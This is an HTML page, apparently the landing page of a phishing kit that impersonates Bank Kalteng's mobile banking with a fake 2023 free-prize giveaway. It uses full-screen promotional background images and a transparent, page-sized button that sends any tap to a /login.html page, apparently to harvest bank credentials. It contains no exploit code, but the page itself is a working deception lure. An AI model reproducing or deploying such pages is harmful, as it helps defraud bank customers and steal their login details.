<!DOCTYPE html>
<html lang="en">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="icon" href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTu-YBCHfTo2fclJYq5wPE0nyks6MO70gVy3w&usqp=CAU">
<meta name="viewport" content="width=device-width,initial-scale=1">
<meta name="theme-color" content="#000000">
<meta name="description" content="Gebyar Bagi-Bagi Hadiah Gratis Betang Mobile 2023">
<link rel="icon" type="image/svg" href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTu-YBCHfTo2fclJYq5wPE0nyks6MO70gVy3w&usqp=CAU">
<title>Gebyar Hadiah Bank Kalteng</title>
<link href="/main.css" rel="stylesheet">
<style>
@charset "utf-8";

* { box-sizing: border-box; margin: 0px; padding: 0px; }

body { -webkit-font-smoothing: antialiased; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; }

.pg1 { background-image: url("/pg1.eb1110ce7226b1ceb6ad.png") !important; height: 105vh !important; padding-top: 41vw !important; }

.pg, .pg1 { background-repeat: no-repeat !important; background-size: 100% !important; width: 100% !important; }

.pg { background-image: url("/pg.2c9ffc8d2d7e7ca18d73.jpeg") !important; height: 115vh !important; padding-top: 470px !important; }

.pg3 { background-image: url("/pg3.8cad0aef9567a81604d3.png") !important; height: 105vh !important; padding-top: 38vw !important; }

.pg2, .pg3 { background-repeat: no-repeat !important; background-size: 100% !important; width: 100% !important; }

.pg2 { background-image: url("/pg2.eb1110ce7226b1ceb6ad.png") !important; height: 120vh !important; padding-top: 82vw !important; }

form { padding: 35px !important; }

label { opacity: 0.7 !important; }

input, select { border-color: rgb(166, 46, 48); border-radius: 5px; box-shadow: rgba(4, 4, 4, 0.12) 2px 2px 8px; padding: 10px; height: 43px !important; margin-bottom: 5px !important; width: 100% !important; }

input:focus, select:focus { outline: rgb(8, 118, 236) solid 1px; }

button { background-color: rgb(67, 160, 71) !important; border: none !important; border-radius: 5px !important; color: rgb(255, 253, 253) !important; height: 45px !important; margin-top: 22px !important; opacity: 1 !important; width: 100% !important; }

.warn { height: 147px; background-color: rgb(255, 255, 0) !important; box-shadow: rgba(0, 0, 0, 0.13) 0px 0px 24px !important; color: rgb(14, 9, 9) !important; font-size: 14px !important; padding: 27px !important; text-align: center !important; }

.okok { background-color: initial !important; height: 219px !important; }

.modal-content { padding: 10px; }</style>
</head>
<body>
    <div id="root"><div>
        <div class="pg">
            <button class="okok" onclick="location.href='/login.html';"></button>
            </div>
            </div>
            </div>
</body>
</html>